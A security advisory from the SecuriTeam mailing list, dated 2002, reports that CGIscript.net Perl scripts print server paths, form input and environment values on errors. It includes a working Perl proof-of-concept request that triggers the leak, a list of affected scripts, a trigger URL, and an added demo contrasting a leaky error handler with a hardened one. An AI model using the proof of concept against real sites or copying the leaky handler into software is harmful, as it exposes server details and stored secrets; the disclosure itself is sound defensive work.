[UNIX] More than Fourteen CGIscript.net Scripts Have Path Disclosure Vulnerability
From: support@securiteam.com Date: 05/19/02
From: support@securiteam.com To: list@securiteam.com Date: Sun, 19 May 2002 21:51:33 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
More than Fourteen CGIscript.net Scripts Have Path Disclosure Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.cgiscript.net/> CGIscript.net sells Perl/CGI web scripts
developed by Mike Barone and Andy Angrick. Recently a number of these
scripts have been shown to have serious security vulnerabilities, and more
problems continue to emerge. This, together with the fact that the
distinctive "csScriptName.cgi" script names are easily located with search
engines, makes the scripts a prime target for attackers.
Most recently, it has been found that almost all the scripts display
"debug" data on errors, including server paths, form input, and environment
values. While this information by itself is not enough to compromise a
server or application, it makes it easier for an attacker to exploit other
problems that may exist on the server or in the application.
Additionally, because the scripts use the same %in hash first for form input
and later for script or database data, it may be possible to view sensitive
data by causing the script to generate an error at a specific point in the
program's execution, after that data has been loaded into the hash.
DETAILS
Exploit:
Because many of the scripts use CGI.pm to process file uploads, causing
CGI.pm to die with an error makes the script display the debug data. One
way to do this is to send an invalid POST request, for example with the
following script:
#!/usr/bin/perl
# show_debug_data.pl
# make cgiscript.net scripts dump debug data by sending a malformed
# multipart/form-data POST: CGI.pm dies while parsing it and the script's
# error handler prints its "debug" output (paths, form input, environment)
use strict;
use IO::Socket::INET;
my $host = 'hostname.com';
my $path = '/cgi-script/CSMailto/CSMailto.cgi';
my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 80, Proto => 'tcp')
    or die "connect to $host:80 failed: $@\n";
# HTTP/1.0 with CRLF line endings so the server actually parses the headers;
# the boundary is deliberately bogus and no body follows, which is what
# makes CGI.pm fail
print $sock "POST $path HTTP/1.0\r\n";
print $sock "Host: $host\r\n";
print $sock "Content-Type: multipart/form-data; boundary=--\r\n";
print $sock "Content-Length: 0\r\n";
print $sock "\r\n";
print <$sock>;    # dump the whole response, including the debug data
close($sock);
The following scripts will generate a "debug" error message when a CGI.pm
error occurs, including server paths, form input, and environment values:
* csBanner.cgi
* csCreatePro.cgi
* CSDownload.cgi
* csFAQ.cgi
* CSFiler.cgi
* CSFileshare.cgi
* CSGrid.cgi
* CSIncludes.cgi
* CSMailto.cgi
* CSNews.cgi
* CSNews.cgi (pro version)
* CSRandomText.cgi
* CSUpload.cgi
Additional scripts can be made to generate errors in other ways.
csPassword.cgi, for example, displays the debug data when requested as:
csPassword.cgi?command=remove
This calls a function that, while referenced by the program, does not
exist; the call fails at runtime, and the script displays the debug data.
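As an added illustration of the error-handling pattern described above (the debug dump on die, and the single %in hash reused for form input and record data), the following script is not CGIscript.net code and is not part of the original advisory. It simulates such a script outside a web server: the request values, the record store and the csDemo.cgi path are constructed for the example, and the two handlers stand side by side, the vulnerable dump and a hardened replacement that logs the detail to the server error log and returns only a reference number.

```perl
#!/usr/bin/perl
# debug_handler_demo.pl -- added example, not CGIscript.net code.
# A CGI-style script that keeps form input and later record data in one
# %in hash, with a __DIE__ handler that dumps %in and %ENV to the browser
# on any error (the pattern in the advisory), beside a hardened handler
# that sends the detail to STDERR (the web server error log) and returns
# only a generic message.  Request, environment and records are constructed.
use strict;
use warnings;

our %in;   # shared hash: form fields first, then record data (the risky pattern)

# Constructed request and CGI environment, standing in for what the web
# server and CGI.pm would have supplied.  Hostname and path are made up.
$ENV{QUERY_STRING}    = 'command=show&user=alice';
$ENV{SCRIPT_FILENAME} = '/home/example/public_html/cgi-bin/csDemo.cgi';
$ENV{DOCUMENT_ROOT}   = '/home/example/public_html';
$ENV{SERVER_NAME}     = 'www.example.com';

# Minimal query-string parser so the demo does not depend on CGI.pm.
sub parse_query {
    my ($qs) = @_;
    my %h;
    for my $pair (split /&/, $qs) {
        my ($k, $v) = split /=/, $pair, 2;
        next unless defined $k;
        $v = '' unless defined $v;
        $v =~ tr/+/ /;
        $v =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
        $h{$k} = $v;
    }
    return %h;
}

# Constructed record store, standing in for the script's flat-file database.
my %records = (alice => { email => 'alice@example.com', password => 'hunter2' });

# Vulnerable: everything the script knows goes back to the browser.
sub debug_die_handler {
    chomp(my $msg = shift);
    print "Content-type: text/plain\n\n";
    print "Error: $msg\n\n-- form/record data --\n";
    print "$_ = $in{$_}\n" for sort keys %in;
    print "\n-- environment --\n";
    print "$_ = $ENV{$_}\n"
        for grep { /^(SCRIPT_FILENAME|DOCUMENT_ROOT|SERVER_NAME|QUERY_STRING)$/ }
            sort keys %ENV;
    exit 1;
}

# Hardened: detail to the error log, opaque reference to the user.
sub safe_die_handler {
    chomp(my $msg = shift);
    my $ref = sprintf '%08x', int rand 0xFFFFFFFF;
    print STDERR "[$ref] $msg\n";          # lands in the server error log
    print "Content-type: text/plain\n\n";
    print "An internal error occurred (reference $ref).\n";
    exit 1;
}

sub run_script {
    my ($handler) = @_;
    local $SIG{__DIE__} = $handler;
    %in = parse_query($ENV{QUERY_STRING});
    # Later in the script the same hash is loaded with record data ...
    my $rec = $records{ $in{user} } or die "no such user\n";
    @in{ keys %$rec } = values %$rec;
    # ... and an error after that point hands the record to the handler.
    die "unknown command '$in{command}'\n" unless $in{command} eq 'edit';
    print "Content-type: text/plain\n\nOK\n";
}

my $mode = shift @ARGV || 'vulnerable';
run_script($mode eq 'safe' ? \&safe_die_handler : \&debug_die_handler);
```

Run with no argument to see the vulnerable output: because the error is raised after the record has been copied into %in, the stored password appears in the response alongside the script path. Run with `safe` to see only the generic message on STDOUT and the detail on STDERR.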
Impact:
Because path disclosure alone is not particularly dangerous, this advisory
has been rated "LOW RISK". It is recommended, however, that users upgrade
as soon as possible to a version of the script(s) that does not disclose
"debug" data on errors.
Solution:
The vendor has stated that because this issue is low risk they do not
intend to patch any of the programs right away, but will include a fix in
the next major revision.
ADDITIONAL INFORMATION
The information has been provided by <mailto:stegus1@yahoo.com> Steve
Gustin.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.